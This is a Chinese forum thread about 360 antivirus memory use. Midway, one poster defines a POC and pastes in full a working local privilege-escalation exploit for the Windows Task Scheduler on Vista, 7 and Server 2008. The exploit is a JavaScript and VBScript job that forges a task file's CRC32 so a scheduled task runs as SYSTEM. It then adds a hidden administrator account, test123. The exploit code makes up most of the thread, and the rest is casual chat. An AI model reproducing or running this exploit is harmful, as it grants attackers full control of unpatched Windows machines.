360杀毒2.0+卫士内存使用需要那么高？(已卸载请锁帖谢谢！）

Lgwu

回复 30楼 红芽芋 的帖子

在安全行业，POC通俗的说就是漏洞利用代码。有POC，通常稍加修改或不用修改，只要编译成功，就可以直接去利用漏洞进行攻击。

红芽芋

Lgwu 发表于 2010-11-24 23:32
回复 30楼 红芽芋 的帖子

在安全行业，POC通俗的说就是漏洞利用代码。有POC，通常稍加修改或不用修改，只要 ...

刚刚百科了一下

Lgwu

回复 32楼 红芽芋 的帖子

给你个链接，Microsoft Windows任务调度服务本地权限提升漏洞：
http://sebug.net/vulndb/20266/ 里面的影响版本和漏洞描述是漏洞相关的信息。

http://sebug.net/exploit/20263/ 里面测试方法下面的代码就是POC

红芽芋

Lgwu 发表于 2010-11-24 23:35
回复 32楼 红芽芋 的帖子

给你个链接，Microsoft Windows任务调度服务本地权限提升漏洞：

谢谢老板，不过校园网不给力

Lgwu

红芽芋 发表于 2010-11-24 23:38
谢谢老板，不过校园网不给力

你真是大悲剧。

Microsoft Windows任务调度服务本地权限提升漏洞
影响版本:
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7

漏洞描述:
Windows的任务调度服务实现上存在访问验证漏洞，本地攻击者可能利用此漏洞把自身的权限提升到SYSTEM权限，从而获取系统的完全控制。
任务调度服务没能正确阻止用户通过COM接口修改XML定义文件中的某些字段，导致恶意用户操纵一个有效的XML文件并绕过CRC校验，实现以SYSTEM权限执行任意指令。

测试方法：

1. # Exploit Title: Windows Task Scheduler Privilege Escalation 0day
   
2. # Date: 20-11-2010
   
3. # Author: webDEViL
   
4. # Tested on: Windows 7/2008 x86/x64
   
5. 
   
6. 
   
7. <job id="tasksch-wD-0day">
   
8. <script language="Javascript">
   
9. 
   
10. crc_table = new Array(
    
11.   0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
    
12.   0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
    
13.   0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
    
14.   0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
    
15.   0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
    
16.   0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
    
17.   0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
    
18.   0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
    
19.   0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
    
20.   0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
    
21.   0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
    
22.   0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
    
23.   0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
    
24.   0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
    
25.   0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
    
26.   0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
    
27.   0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
    
28.   0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
    
29.   0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
    
30.   0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
    
31.   0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
    
32.   0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
    
33.   0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
    
34.   0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
    
35.   0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
    
36.   0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
    
37.   0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
    
38.   0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
    
39.   0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
    
40.   0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
    
41.   0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
    
42.   0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
    
43.   0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
    
44.   0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
    
45.   0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
    
46.   0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
    
47.   0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
    
48.   0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
    
49.   0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
    
50.   0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
    
51.   0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
    
52.   0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
    
53.   0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
    
54.   0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
    
55.   0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
    
56.   0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
    
57.   0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
    
58.   0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
    
59.   0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
    
60.   0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
    
61.   0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
    
62.   0x2D02EF8D
    
63. );
    
64. 
    
65. var hD='0123456789ABCDEF';
    
66. 
    
67. function dec2hex(d) {
    
68. h='';
    
69. for (i=0;i<8;i++) {
    
70. h = hD.charAt(d&15)+h;
    
71. d >>>= 4;
    
72. }
    
73. return h;
    
74. }
    
75. function encodeToHex(str){
    
76.     var r="";
    
77.     var e=str.length;
    
78.     var c=0;
    
79.     var h;
    
80.     while(c<e){
    
81.         h=str.charCodeAt(c++).toString(16);
    
82.         while(h.length<3) h="0"+h;
    
83.         r+=h;
    
84.     }
    
85.     return r;
    
86. }
    
87. function decodeFromHex(str){
    
88.     var r="";
    
89.     var e=str.length;
    
90.     var s=0;
    
91.     while(e>1){
    
92.          
    
93.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
    
94.          
    
95.         s=s+2;
    
96.         e=e-2;
    
97.     }
    
98.      
    
99.     return r;
    
100.      
     
101. }
     
102. 
     
103. 
     
104. function calc_crc(anyForm) {
     
105. 
     
106. anyTextString=decodeFromHex(anyForm);
     
107. 
     
108. Crc_value = 0xFFFFFFFF;
     
109. StringLength=anyTextString.length;
     
110. for (i=0; i<StringLength; i++) {
     
111. tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
     
112. Table_value = crc_table[tableIndex];
     
113. Crc_value >>>= 8;
     
114. Crc_value ^= Table_value;
     
115. }
     
116. Crc_value ^= 0xFFFFFFFF;
     
117. return dec2hex(Crc_value);
     
118. 
     
119. }
     
120. 
     
121. function rev_crc(leadString,endString,crc32) {
     
122. //
     
123. // First, we calculate the CRC-32 for the initial string
     
124. //
     
125.     anyTextString=decodeFromHex(leadString);
     
126.      
     
127.    Crc_value = 0xFFFFFFFF;
     
128.    StringLength=anyTextString.length;
     
129.    //document.write(alert(StringLength));
     
130.    for (var i=0; i<StringLength; i++) {
     
131.       tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
     
132.       Table_value = crc_table[tableIndex];
     
133.       Crc_value >>>= 8;
     
134.       Crc_value ^= Table_value;
     
135.    }
     
136. //
     
137. // Second, we calculate the CRC-32 without the final string
     
138. //
     
139.    crc=parseInt(crc32,16);
     
140.    crc ^= 0xFFFFFFFF;
     
141.    anyTextString=decodeFromHex(endString);
     
142.    StringLength=anyTextString.length;
     
143.    for (var i=0; i<StringLength; i++) {
     
144.       tableIndex=0;
     
145.       Table_value = crc_table[tableIndex];
     
146.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
     
147.          tableIndex++;
     
148.          Table_value = crc_table[tableIndex];
     
149.       }
     
150.       crc ^= Table_value;
     
151.       crc <<= 8;
     
152.       crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
     
153.    }
     
154. //
     
155. // Now let's find the 4-byte string
     
156. //
     
157.    for (var i=0; i<4; i++) {
     
158.       tableIndex=0;
     
159.       Table_value = crc_table[tableIndex];
     
160.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
     
161.          tableIndex++;
     
162.          Table_value = crc_table[tableIndex];
     
163.       }
     
164.       crc ^= Table_value;
     
165.       crc <<= 8;
     
166.       crc |= tableIndex;
     
167.    }
     
168.    crc ^= Crc_value;
     
169. //
     
170. // Finally, display the results
     
171. //
     
172.    var TextString=dec2hex(crc);
     
173.    var Teststring='';
     
174. Teststring=TextString.substring(6,8);
     
175. Teststring+=TextString.substring(4,6);
     
176. Teststring+=TextString.substring(2,4);
     
177. Teststring+=TextString.substring(0,2);
     
178.    return Teststring
     
179. }
     
180. function decodeFromHex(str){
     
181.     var r="";
     
182.     var e=str.length;
     
183.     var s=0;
     
184.     while(e>1){
     
185.          
     
186.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
     
187.          
     
188.         s=s+2;
     
189.         e=e-2;
     
190.     }
     
191.      
     
192.     return r;
     
193.      
     
194. }
     
195. </script>
     
196. 
     
197. 
     
198. 
     
199. <script language="VBScript">
     
200. dim output
     
201. set output = wscript.stdout
     
202. output.writeline " Task Scheduler 0 day - Privilege Escalation "
     
203. output.writeline " Should work on Vista/Win7/2008 x86/x64"
     
204. output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
     
205. biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
     
206. Set objShell = CreateObject("WScript.Shell")
     
207. objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
     
208. 
     
209. Set fso = CreateObject("Scripting.FileSystemObject")
     
210. Set a = fso.CreateTextFile(biatchFile, True)
     
211. a.WriteLine ("net user /add test123 test123")
     
212. a.WriteLine ("net localgroup administrators /add test123")
     
213. a.WriteLine ("schtasks /delete /f /TN wDw00t")
     
214. 
     
215. Function ReadByteArray(strFileName)
     
216. Const adTypeBinary = 1
     
217. Dim bin
     
218.     Set bin = CreateObject("ADODB.Stream")
     
219.     bin.Type = adTypeBinary
     
220.     bin.Open
     
221.     bin.LoadFromFile strFileName
     
222.     ReadByteArray = bin.Read
     
223. 'output.writeline ReadByteArray
     
224. End Function
     
225. 
     
226. Function OctetToHexStr (arrbytOctet)
     
227. Dim k
     
228. OctetToHexStr = ""
     
229. For k = 3 To Lenb (arrbytOctet)
     
230.   OctetToHexStr = OctetToHexStr _
     
231.         & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
     
232. Next
     
233. End Function
     
234. strFileName="C:\windows\system32\tasks\wDw00t"
     
235. 
     
236. hexXML = OctetToHexStr (ReadByteArray(strFileName))
     
237. 'output.writeline hexXML
     
238. crc32 = calc_crc(hexXML)
     
239. output.writeline "Crc32 Original: "+crc32
     
240. 
     
241. 
     
242. Set xmlDoc = CreateObject("Microsoft.XMLDOM")
     
243. 'permissions workaround
     
244. 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
     
245. 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
     
246. Set objShell = WScript.CreateObject("WScript.Shell")
     
247. Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
     
248. 
     
249. Do Until objExecObject.StdOut.AtEndOfStream
     
250. strLine = strLine & objExecObject.StdOut.ReadLine()
     
251. Loop
     
252. hexXML = "FFFE3C00"+OctetToHexStr(strLine)
     
253. 'output.writeline hexXML
     
254. Set ts = fso.createtextfile ("wDw00t.xml")
     
255. For n = 1 To (Len (hexXML) - 1) step 2
     
256. ts.write Chr ("&h" & Mid (hexXML, n, 2))
     
257. Next
     
258. ts.close
     
259. 
     
260. xmlDoc.load "wDw00t.xml"
     
261. Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
     
262. Author.text = "LocalSystem"
     
263. Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
     
264. UserId.text = "S-1-5-18"
     
265. xmldoc.save(strFileName)
     
266. 
     
267. hexXML = OctetToHexStr (ReadByteArray(strFileName))
     
268. 
     
269. leadString=hexXML+"3C0021002D002D00"
     
270. endString="2D002D003E00"
     
271. 'output.writeline leadString
     
272. impbytes=rev_crc(leadString,endString,crc32)
     
273. output.writeline "Crc32 Magic Bytes: "+impbytes
     
274. 
     
275. finalString = leadString+impbytes+endString
     
276. forge = calc_crc(finalString)
     
277. output.writeline "Crc32 Forged: "+forge
     
278. 
     
279. strHexString="FFFE"+finalString
     
280. Set fso = CreateObject ("scripting.filesystemobject")
     
281. Set stream = CreateObject ("adodb.stream")
     
282. 
     
283. Set ts = fso.createtextfile (strFileName)
     
284. 
     
285. For n = 1 To (Len (strHexString) - 1) step 2
     
286. ts.write Chr ("&h" & Mid (strHexString, n, 2))
     
287. Next
     
288. ts.close
     
289. 
     
290. 
     
291. Set objShell = CreateObject("WScript.Shell")
     
292. objShell.Run "schtasks /change /TN wDw00t /disable",,True
     
293. objShell.Run "schtasks /change /TN wDw00t /enable",,True
     
294. objShell.Run "schtasks /run /TN wDw00t",,True
     
295. 
     
296. </script>
     
297. </job>

复制代码

zjkzjy

回复 21楼 windfreedom 的帖子

额…360杀毒一开机就显示内存使用20％以上，确实感觉很差异。

skyl47129

三套装+opera+Q,毫无鸭梨

红芽芋

Lgwu 发表于 2010-11-24 23:41
你真是大悲剧。

# Tested on: Windows 7/2008 x86/x64

我是XP的系统

Lgwu

回复 36楼 zjkzjy 的帖子

360杀毒显示的占用并非全部是自身，其它进程和服务等占用都算在里面。
你看看任务管理器里面，具体是什么占用系统资源不就知道了？

Lgwu

回复 38楼 红芽芋 的帖子

我也是XP，并且系统资源也不让我去虚拟win7这些系统，所以最近才无聊了点。